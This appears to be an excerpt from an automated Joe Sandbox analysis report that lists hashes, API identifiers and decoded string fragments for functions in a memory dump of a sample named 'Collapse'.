                                                                                                        • Opcode Fuzzy Hash: 4afb3a0be42bc4e84ee4da61528e2b8b1700afdb80440233dbd69cf79bf1f5e7
                                                                                                        • Instruction Fuzzy Hash: 30513232709B618BD720CA64D4413BBF7E2EF91350F88892ED5C987385E23CE885D74A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: {f}^
                                                                                                        • API String ID: 0-3345101915
                                                                                                        • Opcode ID: f5d202ce778f47b005ea60204e4605a4ca8240e635d849a4e369c3dec0b357be
                                                                                                        • Instruction ID: 1a0e80ca4230d2559a2117eba3d642fabff395816ed48fe25275b8269107ae4a
                                                                                                        • Opcode Fuzzy Hash: f5d202ce778f47b005ea60204e4605a4ca8240e635d849a4e369c3dec0b357be
                                                                                                        • Instruction Fuzzy Hash: B64116701142528ED7258F39D4206B6F7E1EF9B300F69949DC0C6DB372DB35A812CB98
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D]+\
                                                                                                        • API String ID: 0-1174097187
                                                                                                        • Opcode ID: 6fb55fcbf991541eeb8804c674fc3e74e595e421f3584c9616ebbc4a4cc8bc40
                                                                                                        • Instruction ID: fd81497e5cc6fa5ed09cb19eeb9559c87992125b0fed594d8fc88ac9e301bbc3
                                                                                                        • Opcode Fuzzy Hash: 6fb55fcbf991541eeb8804c674fc3e74e595e421f3584c9616ebbc4a4cc8bc40
                                                                                                        • Instruction Fuzzy Hash: C62124389293158BD724AF59D41033BB3A5AB4DB00F02683E8D82933D1D7B9AD1087CA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: R=-E
                                                                                                        • API String ID: 0-1248821510
                                                                                                        • Opcode ID: f51a2fe3d3346966447099b4c86e8089b97c653c1cfa93d090b6954b4e2939d0
                                                                                                        • Instruction ID: 95121b6fa09362eeed9389480ba3bc508d1b731d0a25e4bff4e98dd85f03e470
                                                                                                        • Opcode Fuzzy Hash: f51a2fe3d3346966447099b4c86e8089b97c653c1cfa93d090b6954b4e2939d0
                                                                                                        • Instruction Fuzzy Hash: C811AD39A193528BD319CF25C8903ABB7E1EFD6344F48686DE4C1A7351C379C90A87DA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f1f6aa22e07ff9151c2a9c1ab6eeb8603e95fc2437cb1f71b13a96f1cf0d2162
                                                                                                        • Instruction ID: 8616d708d026e07aece80386f0b9e6e04010ef8f876f06df7ebb8aaa5fac906c
                                                                                                        • Opcode Fuzzy Hash: f1f6aa22e07ff9151c2a9c1ab6eeb8603e95fc2437cb1f71b13a96f1cf0d2162
                                                                                                        • Instruction Fuzzy Hash: 6522A372A087118BC725DE18D8806ABB3E1BFC4319F19893ED986A7385D738B851CB57
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5ea812e82b81bb4a212e1dcfb79646afe9ae036cc99153fdbfe721ec7e25d1be
                                                                                                        • Instruction ID: 9eefc113a12836842297b3c252d2029d1c11762bca039c7bb9bc4e4b88698534
                                                                                                        • Opcode Fuzzy Hash: 5ea812e82b81bb4a212e1dcfb79646afe9ae036cc99153fdbfe721ec7e25d1be
                                                                                                        • Instruction Fuzzy Hash: 930203366143014BD718DF29D85177BB7D2ABC8314F19A93EE886D3390DB78EC158B86
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9a2e3f1900c97fb0126f885609e66608829065437b72d60bb5809f155f634745
                                                                                                        • Instruction ID: 234df6f714af16d4f4261566cc3c7abd878bfce5ffc52740a1df4eb0bbf52fc5
                                                                                                        • Opcode Fuzzy Hash: 9a2e3f1900c97fb0126f885609e66608829065437b72d60bb5809f155f634745
                                                                                                        • Instruction Fuzzy Hash: 1202D039A18211CFD708DF28E89066AB3E1FB8E315F09887ED946C7261E735E859CB45
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 976ab99eed818dddaa2dc1ebaae2a418e7ca25d3bce21848bf6af55ee17899b8
                                                                                                        • Instruction ID: d686ffac39be6d0f3f455328e8a54ab21bc9d3f7ab2562aa08db86176a306e0c
                                                                                                        • Opcode Fuzzy Hash: 976ab99eed818dddaa2dc1ebaae2a418e7ca25d3bce21848bf6af55ee17899b8
                                                                                                        • Instruction Fuzzy Hash: D2E1C139658211CFD708CF28E89066AB3E1FB8E315F19887DD546C3361E735E869CB4A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 235231ba7a2a0887f536877b44a6934fd6e71bc8cd2a7a9f306462706e505231
                                                                                                        • Instruction ID: b41cb7f2c52101949c77105f9f86ab1574c31dc678e915dd08def74e03ad87bd
                                                                                                        • Opcode Fuzzy Hash: 235231ba7a2a0887f536877b44a6934fd6e71bc8cd2a7a9f306462706e505231
                                                                                                        • Instruction Fuzzy Hash: 4CC1C039658211CFD708CF38E89066AB3E1FB8E315F0A987DD54683361D735E865CB4A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e8214e739066eae89132dd2332742838904b948bf94e7ea8acbd0abaf622387e
                                                                                                        • Instruction ID: cc755e0ba5a25d7edebdce1128681661c6b511607672a390a7c3b85a764aa196
                                                                                                        • Opcode Fuzzy Hash: e8214e739066eae89132dd2332742838904b948bf94e7ea8acbd0abaf622387e
                                                                                                        • Instruction Fuzzy Hash: ADB1F676B143218BD728DE28C89067FB3E2FBD4710F05953EEA85A7391DA39AC108785
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 52c76369ae0ecb2ed50f5792e05598014929a231eb6184d5f3fd9f2e871bbea1
                                                                                                        • Instruction ID: 3543f4c7ba1adf89441eec32064f8de0c7990d7915e0232de5de183476ddcd95
                                                                                                        • Opcode Fuzzy Hash: 52c76369ae0ecb2ed50f5792e05598014929a231eb6184d5f3fd9f2e871bbea1
                                                                                                        • Instruction Fuzzy Hash: F0A1C135A58211CFD718CF38E89062AB3E2FB8E311F09987DD546C3361D635E855CB4A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 74ea14bf07158ac8e967b689a9396f96f020e0a04e058af7c6cd7f013b7d34c5
                                                                                                        • Instruction ID: ecc22bc257a2fb0d19aac58fbc6fd3c64878980aee81a5343072ecda718e8fd7
                                                                                                        • Opcode Fuzzy Hash: 74ea14bf07158ac8e967b689a9396f96f020e0a04e058af7c6cd7f013b7d34c5
                                                                                                        • Instruction Fuzzy Hash: 2AA1B135A58211CFD718DF38D89066BB3E2EB8E305F09983DE48AD3360E635D855CB4A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d4d620547f4fe9b896f8bfcfd67c149e860623443f90c4c1fe7b19f866f05280
                                                                                                        • Instruction ID: 6c6f473fc79ef3d85c8c36f18533c20678f95552c344c83649096497dcc0b208
                                                                                                        • Opcode Fuzzy Hash: d4d620547f4fe9b896f8bfcfd67c149e860623443f90c4c1fe7b19f866f05280
                                                                                                        • Instruction Fuzzy Hash: 5B512F701083059BC3149F14C4A16B7B7F2EFAA718F19191DE4C68B3A1F3389890CBDA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 05773195b55cc7af3532b89651789a1302257b8947be7b90bc65f2655016c293
                                                                                                        • Instruction ID: 99ff26627ec044becbd7bb1d1d7b041eb7a4130d5f82c0f1ad4559d931f4f94b
                                                                                                        • Opcode Fuzzy Hash: 05773195b55cc7af3532b89651789a1302257b8947be7b90bc65f2655016c293
                                                                                                        • Instruction Fuzzy Hash: C141367590E3925BD3098F2584A03BBFBE2DFE2301F19606EE4D557392DB388846C75A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cc078c6a64491d9b5d6d3fb6fcd8aa6389eca69b906fbcf45357792db6d23e0f
                                                                                                        • Instruction ID: 379eeb13d8fae2bbdb8185f076e4fe3c7818ff775dda8ff3e99f036fd98576b2
                                                                                                        • Opcode Fuzzy Hash: cc078c6a64491d9b5d6d3fb6fcd8aa6389eca69b906fbcf45357792db6d23e0f
                                                                                                        • Instruction Fuzzy Hash: 01510FB0405200EFEB548F26C9947127FA1FF45708F24958DD5491F3A6E3BAE846CF89
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: deaa49d3fc64f653787d498b0657b5f8e3027a0f894eb2869bccbd06ddc372d9
                                                                                                        • Instruction ID: 9968eebb9502d7c28eba9f5e8a394a2395f104a33a7a43183597f6f6f2cb192a
                                                                                                        • Opcode Fuzzy Hash: deaa49d3fc64f653787d498b0657b5f8e3027a0f894eb2869bccbd06ddc372d9
                                                                                                        • Instruction Fuzzy Hash: 98410332E182244BE718CF28D99136BB7E79BC9350F1AA53DC88AD7351DA38D8058789
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 02c129bb903568a87d97b66f7c073d4ba734cf659a798011797feb0a4926741d
                                                                                                        • Instruction ID: 5a1241caed594180818f4636cb56e571388ee4ffd58245bdd485821f6fba679c
                                                                                                        • Opcode Fuzzy Hash: 02c129bb903568a87d97b66f7c073d4ba734cf659a798011797feb0a4926741d
                                                                                                        • Instruction Fuzzy Hash: 3851EEB44052009FEB548F26C9907127FA1FF45708F24958DDA491F3A6D3BAE807CF89
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 01d55f0470644cada620ee4172314e1bf1573622bcb255831bae560939fc0501
                                                                                                        • Instruction ID: c29fddc2df2daae3f42b4937981811e275a63e63cc619c343a5bb1ed9a39c9df
                                                                                                        • Opcode Fuzzy Hash: 01d55f0470644cada620ee4172314e1bf1573622bcb255831bae560939fc0501
                                                                                                        • Instruction Fuzzy Hash: 2B31E7729092309BD710DF18C98475BB3E5EBD9744F15A82AE888A7340D37AEC458BD6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7abdc6b612d8572d970bb47383906f18c78fce7094a42d50484e71a97ff5445d
                                                                                                        • Instruction ID: ba97fdd90c280ee238347f72384fe5f6ccf4d734626040229d9d8e40242fd629
                                                                                                        • Opcode Fuzzy Hash: 7abdc6b612d8572d970bb47383906f18c78fce7094a42d50484e71a97ff5445d
                                                                                                        • Instruction Fuzzy Hash: 50315871641700DBD7088F66CCC4B667BA2FFC5704F24E4ACDA094F7AADBB898118B59
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 4de2854d14741699a4ea670b3dd1aed81a5aafab5d42ffcdd241e7575bdf061d
                                                                                                        • Instruction ID: 6a35d2d87e4aae4f0ffca406702f0b101b751249b86d9033aea091713203b1c0
                                                                                                        • Opcode Fuzzy Hash: 4de2854d14741699a4ea670b3dd1aed81a5aafab5d42ffcdd241e7575bdf061d
                                                                                                        • Instruction Fuzzy Hash: FD11577554430C5FD310EB44DDC0BBBB7A9EBC9358F146529EA8463320E26ADC14CBAA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8dead7eb2ead17544e34a8f87b96678dac24aaf6b15151238b1ad58eb2bfaf8d
                                                                                                        • Instruction ID: 8328a4fd559888b7b958e563d327d7a9a06376b0f8b4d1b281856f2da2332d6b
                                                                                                        • Opcode Fuzzy Hash: 8dead7eb2ead17544e34a8f87b96678dac24aaf6b15151238b1ad58eb2bfaf8d
                                                                                                        • Instruction Fuzzy Hash: 1521A4B3A106168BCB28CF68C8825AAFBF1FF55304B06966ED159EB251D734D540CBC4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                        • Instruction ID: 3a8f224c42db33ccfd6a6536d18db3a2d449ce8cb45d11d481393aba99f8db63
                                                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                        • Instruction Fuzzy Hash: 4A112933A051E50EC7168D3C8800575BFE31AA7235F5AD39AF4B49B2D3D6268D8A8359
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a4f55a6098864843e4aae71f94eaa1b8b2efe39e1191d1016ba72d3fec01fef8
                                                                                                        • Instruction ID: c009b0363cfebcf920b853a2b4862277f6b56106570e942fe5aabf265f0346b4
                                                                                                        • Opcode Fuzzy Hash: a4f55a6098864843e4aae71f94eaa1b8b2efe39e1191d1016ba72d3fec01fef8
                                                                                                        • Instruction Fuzzy Hash: 10019EF1B0031247E720EE15A4C172BB2A8AB85708F48407EED0957342DB7DFC25829B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 665f1f29d20b56f61b6ab61339006f172dbc702929565a342989df19a4520635
                                                                                                        • Instruction ID: 2143e196f315bc6a73925a438d52321d3c177c6d5770fa6161a45ec7c9397c98
                                                                                                        • Opcode Fuzzy Hash: 665f1f29d20b56f61b6ab61339006f172dbc702929565a342989df19a4520635
                                                                                                        • Instruction Fuzzy Hash: 5911C474A08252CBC328CF28D4A1A76F7F1FF57301B6899ADC0D78B352DA369845CB49
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fa69774c42029fbac4530b05fab19ce10486e84947affefab3dc5717def380b1
                                                                                                        • Instruction ID: 4829c4bb1fb9a8875be2cc6a8859e035210cf9a52295b2f6c689fe71b3393f92
                                                                                                        • Opcode Fuzzy Hash: fa69774c42029fbac4530b05fab19ce10486e84947affefab3dc5717def380b1
                                                                                                        • Instruction Fuzzy Hash: 6D014939A081118BCB288E30D48167277F3EFA7301B69516EC4C2A7745EB3CE402860D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b17d6aba164ef337a7a954c350607a12b740078940e4763aee2d1980453be1eb
                                                                                                        • Instruction ID: c926d9195837af6d2d1fe2d564c176221c2e5db40c068993f01037b5df013389
                                                                                                        • Opcode Fuzzy Hash: b17d6aba164ef337a7a954c350607a12b740078940e4763aee2d1980453be1eb
                                                                                                        • Instruction Fuzzy Hash: 83F0597B71221507E710CD2AADC452BB766EBC6324B1A413AE841E7280C8B8F806E268
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5f598ddf24c88ad89c7c45594c75e1d5ada9c623ee80a9beea1eac979a575e47
                                                                                                        • Instruction ID: 7cde1d795a2325f791a2591a45a126e857c19a369b5f8500d9a8cad991568fbd
                                                                                                        • Opcode Fuzzy Hash: 5f598ddf24c88ad89c7c45594c75e1d5ada9c623ee80a9beea1eac979a575e47
                                                                                                        • Instruction Fuzzy Hash: 8401A9796457068FE315CF14D850BA6B7F2AF86308F4A947E8082C7392EA79A459C709
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocString
                                                                                                        • String ID: &2$0$92$<2$F2$G2$I2$J2$K2$P2$S2$S2$U2$V2$Y2$Y2$_2$rBW$1
                                                                                                        • API String ID: 2525500382-1704840789
                                                                                                        • Opcode ID: f902b592b6eba6466cdfafd08a383cbd4100be188b91849ddb173ee8b47d4ebe
                                                                                                        • Instruction ID: 74ae05fafc35c9b705cb94cf23568fa8391c61c6ad6acd50c28dcf27fe9afe66
                                                                                                        • Opcode Fuzzy Hash: f902b592b6eba6466cdfafd08a383cbd4100be188b91849ddb173ee8b47d4ebe
                                                                                                        • Instruction Fuzzy Hash: 9461C532A2D7508AD368CF68CA0539FB6E1BFC5300F15AA6DD4D99B364E7748901C78B
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocString
                                                                                                        • String ID: &2$0$92$<2$F2$G2$I2$J2$K2$P2$S2$S2$U2$V2$Y2$Y2$_2$rBW$1
                                                                                                        • API String ID: 2525500382-1704840789
                                                                                                        • Opcode ID: 6ceb89d6d5e4c09f3b9326815a3f473e67c1d16999f192d9aa92e0c138436fed
                                                                                                        • Instruction ID: b48d8866ef7672cf2c0e1fe15cec0ebcc93c84dfb12a9cd0e8d39250c797a1d1
                                                                                                        • Opcode Fuzzy Hash: 6ceb89d6d5e4c09f3b9326815a3f473e67c1d16999f192d9aa92e0c138436fed
                                                                                                        • Instruction Fuzzy Hash: 9F61C532A2D7508AD368CF78CA0139BB6E1BFC5300F15A96DD4D99B364EB748901C74B
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$ClearInit
                                                                                                        • String ID: Q0$e0$f0$g0$q0$s0$u0$v0$z0$~0
                                                                                                        • API String ID: 2610073882-1706572778
                                                                                                        • Opcode ID: 6c4633c437742d5ea02f2b05637dc49c13de568e3c4b056a3204ae06464dd71b
                                                                                                        • Instruction ID: 6a188afcc4417f1c0665edfbb67c2855a393ec20af716859af6148eab1d08b1b
                                                                                                        • Opcode Fuzzy Hash: 6c4633c437742d5ea02f2b05637dc49c13de568e3c4b056a3204ae06464dd71b
                                                                                                        • Instruction Fuzzy Hash: B331037951C3808BD328DF25C0957EBB7E1AF98700F00882DD5C98B3A1EBB54688CB47